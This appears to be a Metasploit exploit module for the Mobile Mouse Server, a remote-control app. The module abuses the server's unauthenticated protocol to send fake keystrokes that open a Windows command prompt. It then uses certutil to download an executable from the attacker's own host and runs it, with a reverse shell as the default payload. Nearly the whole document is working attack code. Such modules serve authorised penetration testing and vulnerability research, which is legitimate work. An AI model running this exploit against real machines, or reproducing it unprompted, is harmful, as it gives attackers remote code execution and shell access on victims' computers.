Mobile Mouse Remote Code Execution

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Exploit::Remote::Tcp  include Exploit::EXE # generate_payload_exe  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Mobile Mouse RCE',        'Description' => %q{          This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol          to deploy a payload and run it from the server.  This module will only deploy          a payload if the server is set without a password (default).          Tested against 3.6.0.4, current at the time of module writing        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'CHOKRI HAMMEDI' # edb        ],        'References' => [          [ 'EDB', '51010' ],          [ 'URL', 'https://mobilemouse.com/' ],        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          ['default', {}],        ],        'Payload' => {          'BadChars' => "\x04\x1E"        },        'DefaultOptions' => {          'PAYLOAD' => 'windows/shell/reverse_tcp'        },        'DisclosureDate' => '2022-09-20',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK] # typing on screen        }      )    )    register_options(      [        OptPort.new('RPORT', [true, 'Port Mobile Mouse runs on', 9099]),        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 3]),        OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),      ]    )  end  def path    return datastore['PATH'] if datastore['PATH'].end_with? '\\'    "#{datastore['PATH']}\\"  end  def connect_command    connect_command = 'CONNECT' # 434F4E4E454354    connect_command << "\x1E\x1E"    connect_command << @client_name    connect_command << "\x1E"    connect_command << 'iPhone' # 6950686F6E65    connect_command << "\x1E"    # the next 2,2 may be a version number of some sort    connect_command << '2' # 32    connect_command << "\x1E"    connect_command << '2' # 32    connect_command << "\x1E\x04"    sock.put(connect_command)    sleep(datastore['SLEEP'])  end  def open_command_prompt    open_command_prompt = 'KEY' # 4b4559    open_command_prompt << "\x1E"    open_command_prompt << '114' # 313134 windows key?    open_command_prompt << "\x1E"    open_command_prompt << 'r' # 72    open_command_prompt << "\x1E"    open_command_prompt << 'OPT' # 4f5054    open_command_prompt << "\x04"    sock.put(open_command_prompt)    sleep(datastore['SLEEP'])  end  def script_content(payload)    script_content = 'KEY' # 4B4559    script_content << "\x1E"    script_content << '100' # 313030    script_content << "\x1E"    script_content << payload    script_content << "\x1E\x04"    script_content << 'KEY' # 4B4559    script_content << "\x1E"    script_content << '-1' # 2d31    script_content << "\x1E"    script_content << 'ENTER' # 454e544552    script_content << "\x1E\x04"    sock.put(script_content)    sleep(datastore['SLEEP'])  end  def on_request_uri(cli, _req)    p = generate_payload_exe    send_response(cli, p)    print_good("Payload request received, sending #{p.length} bytes of payload for staging")  end  def check    if datastore['CLIENTNAME'].blank?      @client_name = Rex::Text.rand_text_alphanumeric(5..10).to_s      print_status("Client name set to: #{@client_name}")    else      @client_name = datastore['CLIENTNAME']    end    connect    print_status('Connecting')    connect_command    res = sock.get_once    if res.nil?      return CheckCode::Unknown('No response received from target')    end    disconnect    res = res.split("\x1E")    if res[1] == 'NO'      return CheckCode::Safe("Unable to connect, server response: #{res[4]}")    end    CheckCode::Appears("Connected to hostname #{res[3]} with MAC address #{res[5]}")  end  def exploit    if datastore['CLIENTNAME'].blank?      @client_name = Rex::Text.rand_text_alphanumeric(5..10).to_s      print_status("Client name set to: #{@client_name}")    else      @client_name = datastore['CLIENTNAME']    end    connect    print_status('Connecting')    connect_command    res = sock.get_once    if res.nil?      fail_with(Failure::Disconnected, 'No response received from target')    end    res = res.split("\x1E")    if res[1] == 'NO'      fail_with(Failure::NoAccess, "Unable to connect, server response: #{res[4]}")    end    vprint_good("Connected to hostname #{res[3]} with MAC address #{res[5]}")    print_status('Opening Command Prompt')    open_command_prompt    # for whatever reason, if we don't read here the server doesn't want to keep playing with us, so read but throw away    sock.get_once    print_status('Sending stager')    filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'    register_file_for_cleanup("#{path}#{filename}")    # I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2    stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"    start_service('Path' => '/') # start webserver    script_content(stager)    print_status('Opening Command Prompt again')    open_command_prompt    print_status('Executing payload')    script_content("#{path}#{filename} && exit")    handler    disconnect    sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert  endend